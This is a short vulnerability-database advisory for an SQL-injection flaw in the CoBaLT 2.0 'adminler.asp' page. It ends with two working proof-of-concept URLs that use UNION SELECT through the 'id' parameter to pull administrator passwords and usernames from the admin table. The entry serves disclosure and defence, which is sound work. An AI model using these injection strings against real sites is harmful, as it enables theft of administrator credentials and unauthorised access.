CoBaLT 2.0 - 'adminler.asp' SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:84985
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/28831/info

CoBaLT is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CoBaLT 2.0 is affected; other versions may also be vulnerable. 

http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin
http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4